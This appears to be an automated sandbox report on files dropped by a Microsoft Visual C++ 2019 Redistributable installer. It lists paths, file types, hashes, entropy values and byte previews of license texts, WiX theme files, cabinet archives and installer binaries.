SHA-256:	E5ABE3CB3BF84207DAC4E6F5BBA1E693341D01AEA076DD2D91EAA21C6A6CB925
SHA-512:	B3B7A22D0CDADA21A977F1DCEAF2D73212A4CDDBD298532B1AC97575F36113D45E8D71C60A6D8F8CC2E9DBF18EE1000167CFBF0B2E7ED6F05462D77E0BCA0E90
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] Kurulumu</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.ptal etmek istedi.inizden emin misiniz?</String>.. <String Id="HelpHeader">Kurulum Yard.m.</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [dizin] - y.kler, onar.r, kald.r.r ya da.. dizindeki paketin tam bir yerel kopyas.n. olu.turur. Varsay.lan install de.eridir...../passive \| /quiet - en az d.zeyde istemsiz UI g.sterir ya da hi. UI g.stermez ve.. istem yoktur. Varsay.lan olarak UI ve t.m istemler g.r.nt.lenir...../norestart - yeniden ba.lama denemelerini engeller. Varsay.lan olarak UI yeniden ba.l

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\2052\license.rtf

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	17863
Entropy (8bit):	3.9617786349452775
Encrypted:	false
SSDEEP:	192:BxoqPyOj+/8Tk5VigWgijAlk5xWvSCI5lgios0EhGXxGMLVGW+uUoqyLZDvAJxMx:vbIeaE7q3KGgzD2
MD5:	3CF16377C0D1B2E16FFD6E32BF139AC5
SHA1:	D1A8C3730231D51C7BB85A7A15B948794E99BDCE
SHA-256:	E95CA64C326A0EF7EF3CED6CDAB072509096356C15D1761646E3C7FDA744D0E0
SHA-512:	E9862FD0E8EC2B2C2180183D06535A16A527756F6907E6A1D2DB85092636F72C497508E793EE8F2CC8E0D1A5E090C6CCF465F78BC1FA8E68DAF7C68815A0EE16
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset134 SimSun;}{\f1\fnil\fcharset0 Tahoma;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9\'ce\'a2\'c8\'ed\'c8\'ed\'bc\'fe\'d0\'ed\'bf\'c9\'cc\'f5\'bf\'ee\f1\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0\f0\'d5\'e2\'d0\'a9\'d0\'ed\'bf\'c9\'cc\'f5\'bf\'ee\'ca\'c7\f1 Microsoft Corporation\f0\'a3\'a8\'bb\'f2\'c4\'fa\'cb\'f9\'d4\'da\'b5\'d8\'b5\'c4\f1 Microsoft \f0\'b9\'d8\'c1\'aa\'b9\'ab\'cb\'be\'a3\'a9\'d3\'eb\'c4\'fa\'d6\'ae\'bc\'e4\'b4\'ef\'b3\'c9\'b5\'c4\'d0\'ad\'d2\'e9\'a1\'a3\'d5\'e2\'d0\'a9\'cc\'f5\'bf\'ee\'ca\'ca\'d3\'c3\'d3\'da\'c9\'cf\'ca\'f6\'c8\'ed\'bc\'fe\'a1\'a3\'d5\'e2\'d0\'a9\'cc\'f5\'bf\'ee\'d2\'b2\'ca\'ca\'d3\'c3\'d3\'da\'d5\'eb\'b6\'d4\'b8\'c3\'c8\'ed\'bc\'fe\'b5\'c4\'c8\'ce\'ba\'ce\'ce\'a2\'c8\'ed\'b7\'fe\'ce\'f1\'bb\'f2\'b8\'fc\'d0\'c2\'a3\'ac\'b5\'ab\'d3\'d0\'b2\'bb\'cd\

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\2052\thm.wxl

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2978
Entropy (8bit):	6.135205733555905
Encrypted:	false
SSDEEP:	48:c5DiTlOtKesi+hDtkQf7lz+W0gopN3m5+3cNONeN1ra8vWqPtlTKxKUTKlKXRoR+:uDiTlV5kQR9GLeE0ZxV6gIV
MD5:	3D1E15DEEACE801322E222969A574F17
SHA1:	58074C83775E1A884FED6679ACF9AC78ABB8A169
SHA-256:	2AC8B7C19A5189662DE36A0581C90DBAD96DF259EC00A28F609B644C3F39F9CA
SHA-512:	10797919845C57C5831234E866D730EBD13255E5BF8BA8087D53F1D0FC5D72DC6D5F6945DBEBEE69ACC6A2E20378750C4B78083AE0390632743C184532358E10
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">......</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [..] - .......... ..................Install ........../passive \| /quiet - ..... UI ......... UI ... ........ UI ........../norestart - ..................... UI.../log log.txt - ............. %TEMP% ...

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\3082\license.rtf

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	10714
Entropy (8bit):	5.122578090102117
Encrypted:	false
SSDEEP:	192:WthGE/9wd8eQF/hJOmQeNrXT77uOlQ+v3AqHqc3wpXGYdjvsk2cwBb2:mhGuhj+ed388Bb2
MD5:	FBF293EE95AFEF818EAF07BB088A1596
SHA1:	BBA1991BA6459C9F19B235C43A9B781A24324606
SHA-256:	1FEC058E374C20CB213F53EB3C44392DDFB2CAA1E04B7120FFD3FA7A296C83E2
SHA-512:	6971F20964EF74B19077EE81F953342DC6D2895A8640EC84855CECCEA5AEB581E6A628BCD3BA97A5D3ACB6CBE7971FDF84EF670BDDF901857C3CD28855212019
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 T\'c9RMINOS DE LA LICENCIA DE SOFTWARE DE MICROSOFT\par..MICROSOFT VISUAL C++ 2019 RUNTIME\par..\b0 Estos t\'e9rminos de licencia constituyen un contrato entre Microsoft Corporation (o, en funci\'f3n de donde resida, una de sus filiales) y usted. Se aplican al software antes mencionado. Los t\'e9rminos tambi\'e9n se aplican a cualquier servicio o actualizaci\'f3n de Microsoft para el software, excepto en la medida que tengan t\'e9rminos diferentes.\par..\b SI USTED CUMPLE CON LOS PRESENTES T\'c9RMINOS DE ESTA LICENCIA, DISPONDR\'c1 DE LOS DERECHOS QUE SE DESCRIBEN A CONTINUACI\'d3N.\par....\pard{\pntext\f2\'B7\tab}{\\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\3082\thm.wxl

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3265
Entropy (8bit):	5.0491645049584655
Encrypted:	false
SSDEEP:	48:c5DiTlO/esS6VGhDv4tiUiyRUqzC4U+aD6N3m7xNh1NWNGbPz+9o3PWeKK9K9KfT:uDiTlxouUTiySqyIwz9sgxqvjIk8
MD5:	47F9F8D342C9C22D0C9636BC7362FA8F
SHA1:	3922D1589E284CE76AB39800E2B064F71123C1C5
SHA-256:	9CBB2B312C100B309A1B1495E84E2228B937612885F7A642FBBD67969B632C3A
SHA-512:	E458DF875E9B0622AEBE3C1449868AA6A2826A1F851DB71165A872B2897CF870CCF85046944FF51FFC13BB15E54E9D9424EC36CAF5A2F38CE8B7D6DC0E9B2363
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instalaci.n de [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.Est. seguro de que desea cancelar la operaci.n?</String>.. <String Id="HelpHeader">Ayuda de configuraci.n</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - instala, repara, desinstala o.. crea una copia local completa del paquete en el directorio. La opci.n predeterminada es la instalaci.n...../passive \| /quiet - muestra una IU m.nima sin solicitudes o no muestra ninguna IU ni.. solicitud. De forma predeterminada, se muestran la IU y todas las solicitudes...../norestart - elimina cualquier intento

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\BootstrapperApplicationData.xml

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (558), with CRLF line terminators
Category:	dropped
Size (bytes):	13122
Entropy (8bit):	3.729412080010859
Encrypted:	false
SSDEEP:	192:X0sg+QnH5zHqQHG0Hd8Hz7HE06HA0rH3FxF6OxLo3MzLa0LTnDBx7z8NkzzkvQwj:X0sBydLbmnoN10A1TpotVos
MD5:	B51EF22109AEEA9AE5190E9EF67D9476
SHA1:	FDF939DA26A1268CDF0510AA40FBCA614947C9FD
SHA-256:	1031C44505A4D8322C3BFF5BA92AE5E2C84D7041A01537D187726C9D4E862E5F
SHA-512:	27AA0612337B7473C75BA73EFAF606EE1DB13F7F633151ED5BFF7A9BB5A5AF5502EF3597AE0E95F714F5F0D19A2452413BD18E91516E696DED76C277D0BCA238
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.x./.2.0.1.0./.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a.".>..... . .<.W.i.x.B.a.l.C.o.n.d.i.t.i.o.n. .C.o.n.d.i.t.i.o.n.=.".V.e.r.s.i.o.n.N.T. .&.g.t.;.=. .v.6...0. .O.R. .(.V.e.r.s.i.o.n.N.T. .=. .v.5...1. .A.N.D. .S.e.r.v.i.c.e.P.a.c.k.L.e.v.e.l. .&.g.t.;.=. .2.). .O.R. .(.V.e.r.s.i.o.n.N.T. .=. .v.5...2. .A.N.D. .S.e.r.v.i.c.e.P.a.c.k.L.e.v.e.l. .&.g.t.;.=. .1.).". .M.e.s.s.a.g.e.=.".[.W.i.x.B.u.n.d.l.e.N.a.m.e.]. .c.a.n. .o.n.l.y. .b.e. .i.n.s.t.a.l.l.e.d. .o.n. .W.i.n.d.o.w.s. .X.P. .S.P.2. .a.n.d. .n.e.w.e.r. .p.l.a.t.f.o.r.m.s...". ./.>..... . .<.W.i.x.B.u.n.d.l.e.P.r.o.p.e.r.t.i.e.s. .D.i.s.p.l.a.y.N.a.m.e.=.".M.i.c.r.o.s.o.f.t. .V.i.s.u.a.l. .C.+.+. .2.0.1.5.-.2.0.1.9. .R.e.d.i.s.t.r.i.b.u.t.a.b.l.e. .(.x.8.6.). .-. .1.4...2.5...2.8.5.0.8.". .L.o.g.P.

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\license.rtf

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	9046
Entropy (8bit):	5.157073875669985
Encrypted:	false
SSDEEP:	192:W8lZ1UVDWkgWZTIsvPhghtQ1Qf4lCfnEtHixEGx736wHqItfSpOy2:9T15WZMgAYlOnjt5HLoL2
MD5:	2EABBB391ACB89942396DF5C1CA2BAD8
SHA1:	182A6F93703549290BCDE92920D37BC1DEC712BB
SHA-256:	E3156D170014CED8D17A02B3C4FF63237615E5C2A8983B100A78CB1F881D6F38
SHA-512:	20D656A123A220CD3CA3CCBF61CC58E924B44F1F0A74E70D6850F39CECD101A69BCE73C5ED14018456E022E85B62958F046AA4BD1398AA27303C2E86407C3899
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT SOFTWARE LICENSE TERMS\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 These license terms are an agreement between Microsoft Corporation (or based on where you live, one of its affiliates) and you. They apply to the software named above. The terms also apply to any Microsoft services or updates for the software, except to the extent those have different terms.\par..\b IF YOU COMPLY WITH THESE LICENSE TERMS, YOU HAVE THE RIGHTS BELOW.\par....\pard{\pntext\f2\'B7\tab}{\\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\sl240\slmult1\tx360 INSTALLATION AND USE RIGHTS. \b0\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-363\

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\logo.png

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	PNG image data, 64 x 64, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1861
Entropy (8bit):	6.868587546770907
Encrypted:	false
SSDEEP:	24:q36cnTKM/3kTIQiBmYKHeQWalGt1Sj9kYIt1uZ+bYOQe0IChR95aW:qqiTKMPuUBm7eQJGtYJM1uZCVszaW
MD5:	D6BD210F227442B3362493D046CEA233
SHA1:	FF286AC8370FC655AEA0EF35E9CF0BFCB6D698DE
SHA-256:	335A256D4779EC5DCF283D007FB56FD8211BBCAF47DCD70FE60DED6A112744EF
SHA-512:	464AAAB9E08DE610AD34B97D4076E92DC04C2CDC6669F60BFC50F0F9CE5D71C31B8943BD84CEE1A04FB9AB5BBED3442BD41D9CB21A0DD170EA97C463E1CE2B5B
Malicious:	false
Preview:	.PNG........IHDR...@...@.............sRGB.........gAMA......a.....PLTE].q^.r_.r_.s`.s`.s`.ta.ta.ub.ub.vc.vd.vd.vd.we.we.xe.xg.yg yg zh zh"zi"{j#\|i${j$\|n~n.n,.o,.p..q0.r2.s3.t5.x;.x<.y>.z?.\|B.~C.}E..F..F..H..I..J..L..O..P..W..Y..^..a..c..g..i..q..r..}.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................S......pHYs..%...%....^.....tEXtSoftware.Paint.NET v3.5.100.r.....IDATXG..iW.@...EJ.$M...`AEpG..7TpWT@\.."....(..(.._;...di:9.c>q..g....T...._...-....F..+..w.

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\thm.wxl

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2952
Entropy (8bit):	5.052095286906672
Encrypted:	false
SSDEEP:	48:c5DiTl/+desK19hDUNKwsqq8+JIDxN3mt7NlN1NVvAdMcgLPDHVXK8KTKjKnSnYF:uDiTl/BbTxmup/vrxATd
MD5:	FBFCBC4DACC566A3C426F43CE10907B6
SHA1:	63C45F9A771161740E100FAF710F30EED017D723
SHA-256:	70400F181D00E1769774FF36BCD8B1AB5FBC431418067D31B876D18CC04EF4CE
SHA-512:	063FB6685EE8D2FA57863A74D66A83C819FE848BA3072B6E7D1B4FE397A9B24A1037183BB2FDA776033C0936BE83888A6456AAE947E240521E2AB75D984EE35E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29" />.... <String Id="Caption">[WixBundleName] Setup</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Are you sure you want to cancel?</String>.. <String Id="HelpHeader">Setup Help</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - installs, repairs, uninstalls or.. creates a complete local copy of the bundle in directory. Install is the default...../passive \| /quiet - displays minimal UI with no prompts or displays no UI and.. no prompts. By default UI and all prompts are displayed...../norestart - suppress any attempts to restart. By default UI will prompt before restart.../log log.txt - logs to a specific file. B

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\thm.xml

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	8332
Entropy (8bit):	5.184632608060528
Encrypted:	false
SSDEEP:	96:8L2HdQG+3VzHfz96zYFGaPSWXdhRAmImlqFQKFBiUxn7Ke5A82rkO/pWk3nswP:ZHAzZ/3
MD5:	F62729C6D2540015E072514226C121C7
SHA1:	C1E189D693F41AC2EAFCC363F7890FC0FEA6979C
SHA-256:	F13BAE0EC08C91B4A315BB2D86EE48FADE597E7A5440DCE6F751F98A3A4D6916
SHA-512:	CBBFBFA7E013A2B85B78D71D32FDF65323534816978E7544CA6CEA5286A0F6E8E7E5FFC4C538200211F11B94373D5658732D5D8AA1D01F9CCFDBF20F154F1471
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. Copyright (c) .NET Foundation and contributors. All rights reserved. Licensed under the Microsoft Reciprocal License. See LICENSE.TXT file in the project root for full license information. -->......<Theme xmlns="http://wixtoolset.org/schemas/thmutil/2010">.. <Window Width="485" Height="300" HexStyle="100a0000" FontId="0">#(loc.Caption)</Window>.. <Font Id="0" Height="-12" Weight="500" Foreground="000000" Background="FFFFFF">Segoe UI</Font>.. <Font Id="1" Height="-24" Weight="500" Foreground="000000">Segoe UI</Font>.. <Font Id="2" Height="-22" Weight="500" Foreground="666666">Segoe UI</Font>.. <Font Id="3" Height="-12" Weight="500" Foreground="000000" Background="FFFFFF">Segoe UI</Font>.. <Font Id="4" Height="-12" Weight="500" Foreground="ff0000" Background="FFFFFF" Underline="yes">Segoe UI</Font>.... <Image X="11" Y="11" Width="64" Height="64" ImageFile="logo.png" Visible="yes"/>.. <Text X="80" Y="11" Width="-11" Heig

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\wixstdba.dll

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	195600
Entropy (8bit):	6.682530937585544
Encrypted:	false
SSDEEP:	3072:OXoiFK6b0k77I+QfaIl191rSJHvlalB+8BHkY6v53EfcUzN0m6I+WxBlnKzeZuqt:OXoQNb++gDrSJdr8BHkPh3wIgnK/IU1a
MD5:	EAB9CAF4277829ABDF6223EC1EFA0EDD
SHA1:	74862ECF349A9BEDD32699F2A7A4E00B4727543D
SHA-256:	A4EFBDB2CE55788FFE92A244CB775EFD475526EF5B61AD78DE2BCDFADDAC7041
SHA-512:	45B15ADE68E0A90EA7300AEB6DCA9BC9E347A63DBA5CE72A635957564D1BDF0B1584A5E34191916498850FC7B3B7ECFBCBFCB246B39DBF59D47F66BC825C6FD2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3..R...R...R..h.N..R..h.L.R..h.M..R.......R.......R.......R...<..R...,..R...R...S..K....R..K....R..N.@..R...R(..R..K....R..Rich.R..................PE..L......Z...........!................d.....................................................@..............................................................D......,.......T...............................@...............X............................text............................... ..`.rdata.............................@..@.data...............................@....gfids..............................@..@.rsrc...............................@..@.reloc..,...........................@..B........................................................................................................................................................................................................................................

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	647912
Entropy (8bit):	7.215948724836638
Encrypted:	false
SSDEEP:	12288:snMwHskY7gjcjhVIEhqgM7bWvcsi6aVhPIyP3WRCzJ9ztLz5/YTDd:6MysZgjS1hqgSC/izxf+czJZhz5Qnd
MD5:	2F9D2B6CE54F9095695B53D1AA217C7B
SHA1:	3F54934C240F1955301811D2C399728A3E6D1272
SHA-256:	0009D3F27837C3AF3F6FFF7973FAF07AFAA4B53119846F55B6F2A79F1759C757
SHA-512:	692857F960F26039C7B0AF6329E65A71E8588FF71EAAC6B956BD6E437994A8D5A470C7E75DD776E0772E473967B64D5EA0E1D8396546691316DAF4D6B8CCC237
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'.u.'.u.'.u.......u.....[.u.....?.u...v.4.u...q.4.u...p...u.....".u....6.u.'.t.v.u...p.l.u....&.u.'..%.u...w.&.u.Rich'.u.........................PE..L......Z.....................v......m.............@..........................p............@..............................................;...............$...0...=.. t..T...................tt......@n..@...................$........................text.............................. ..`.rdata..............................@..@.data...@...........................@....wixburn8...........................@..@.tls................................@....gfids..............................@..@.rsrc....;.......<..................@..@.reloc...=...0...>..................@..B........................................................................................................................................................

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\cab54A5CABBE7274D8A22EB58060AAB7623

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	Microsoft Cabinet archive data, many, 1350653 bytes, 50 files, at 0x44 +A "api_ms_win_core_console_l1_1_0.dll" +A "api_ms_win_core_datetime_l1_1_0.dll", flags 0x4, number 1, extra bytes 20 in head, 111 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	1367669
Entropy (8bit):	7.997832401624505
Encrypted:	true
SSDEEP:	24576:OawWVgz9615LBBl9NWA5852M/fzoapq0m9Oz03FOae6p4Cjd81kD0+0CCxco2iJs:OawWV+96vVBNWOMU0qhOz035e6ppNCst
MD5:	29C34C40D349C145E297B6977908E687
SHA1:	025B5CF7D6515CC6151628063752C159F41D99C7
SHA-256:	61AACFF6365DA15F2C9D0FF1C8FB2EC207D145CD9104AFA0CE663BF1542DB245
SHA-512:	BBD9F65C2619DE25F99A8BA21346D7EA46DB9EBA79FEB6039E0E86999D1EA2C9A4564FA727DDA442A69C169DBDC8A4913DF925C42B3AD7F4030A655AC01C0691
Malicious:	false
Preview:	MSCF............D...........2...................xB..........~...o....O........(P.. .api_ms_win_core_console_l1_1_0.dll..M...O....(P.. .api_ms_win_core_datetime_l1_1_0.dll..N........(P.. .api_ms_win_core_debug_l1_1_0.dll. M........(P.. .api_ms_win_core_errorhandling_l1_1_0.dll. [...9....(P.. .api_ms_win_core_file_l1_1_0.dll. M..0.....(P.. .api_ms_win_core_file_l1_2_0.dll. M..P.....(P.. .api_ms_win_core_file_l2_1_0.dll. M..p.....(P.. .api_ms_win_core_handle_l1_1_0.dll..O...{....(P.. .api_ms_win_core_heap_l1_1_0.dll..O........(P.. .api_ms_win_core_interlocked_l1_1_0.dll..O..p.....(P.. .api_ms_win_core_libraryloader_l1_1_0.dll..W..`k....(P.. .api_ms_win_core_localization_l1_2_0.dll..O..P.....(P.. .api_ms_win_core_memory_l1_1_0.dll. M..@.....(P.. .api_ms_win_core_namedpipe_l1_1_0.dll..Q..``....(P.. .api_ms_win_core_processenvironment_l1_1_0.dll..U..P.....(P.. .api_ms_win_core_processthreads_l1_1_0.dll..O..@.....(P.. .api_ms_win_core_processthreads_l1_1_1.dll..K..0X....(P.. .api_ms_win_core_

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\cabB3E1576D1FEFBB979E13B1A5379E0B16

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	Microsoft Cabinet archive data, many, 5194062 bytes, 14 files, at 0x44 +A "mfc140.dll" +A "mfc140chs.dll", flags 0x4, number 1, extra bytes 20 in head, 326 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	5211054
Entropy (8bit):	7.998080908238165
Encrypted:	true
SSDEEP:	98304:dEpMtGvCYmfjBvRxMh7vhetajX6x0XSvrTBEbwwF0XVsvufq:dElCPLBvE8xuEebw6vuy
MD5:	4FEADE30692872EAB413C1123A5F3DE4
SHA1:	B08C319BD7E01176F02D0DC3B4AA8B7C5B9A82C6
SHA-256:	2805E5CC8E477AC1D6847B3CF083A85EC463F646037B59C93CB9E3096A78B81A
SHA-512:	145956C65E193AD5309CA3C0F0BC94DFB20C6BCF73494BDE2ABC48F6495061EE727C9FAA1B97739FE3028873A540A5F17FDFFEB08D8C3A35C2CD7B3DDB088E54
Malicious:	false
Preview:	MSCF....NAO.....D...........................NAO.`B..............F... .H.......(P.. .mfc140.dll.... .H...(P.. .mfc140chs.dll. .....I...(P.. .mfc140cht.dll..)..(nJ...(P.. .mfc140deu.dll. .....K...(P.. .mfc140enu.dll. %..8.L...(P.. .mfc140esn.dll..)..X.M...(P.. .mfc140fra.dll..!..H.N...(P.. .mfc140ita.dll.....8.P...(P.. .mfc140jpn.dll.....(.P...(P.. .mfc140kor.dll.......Q...(P.. .mfc140rus.dll. .M...R...(P.. .mfc140u.dll. C..(e....(P.. .mfcm140.dll. C..H.....(P.. .mfcm140u.dll..J.%.4..CK..w....0...Q6Q..}.......[.nl....;. ...L.....H%.K.w}.<.u..y.y.....g........M6....E..}.m.=...?....?.$Q4...O..;..<8....^{........].Ov....<$.u.d..${...........i..z......s,p.....?...8..F......].~=c.{.].~=m.C.?~..A..6....O....~.h...\..v...s.l..z..'..q..=\|..l...........h.I&...j.N..Y..;.I..-*'D.....;/.Eq.....(...../SG..u..t..eO\|o.p..F.../......{t....E..g/..$.s./..v.........l.Vt.y...L....xW.e&._.i.d..Q4.c......?.=.8$...9..]..N....X>a.]..%...._g.Ng...w.5..........V........v71.~2.

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\vcRuntimeAdditional_x86

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2019 X86 Additional Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508., Template: Intel;1033, Revision Number: {AD7DFCA8-EC53-476F-8C40-02D89ABDEA49}, Create Time/Date: Wed Jan 8 09:31:14 2020, Last Saved Time/Date: Wed Jan 8 09:31:14 2020, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
Category:	dropped
Size (bytes):	184320
Entropy (8bit):	6.3376915344280516
Encrypted:	false
SSDEEP:	3072:JviOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJdN:JvipBaTDo1j//SZhN
MD5:	4B97853A7D10743D67665CCDD67E8566
SHA1:	AF5F7059C9A05A388B4773917E17A078FA58F5E9
SHA-256:	63802C8D96CF21A8EADB1EC5B0B52A9A040581AB2797FE5132E1B3A469108713
SHA-512:	ED88564A372FBA36FB7F2D98476C82D1D66B17B25AB9B6C34489D33BB7F1D64ABBD2E746E75470E05DECA09252D9B855AB0F37F6F82210AF3F006C9A683C7370
Malicious:	false
Preview:	......................>..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................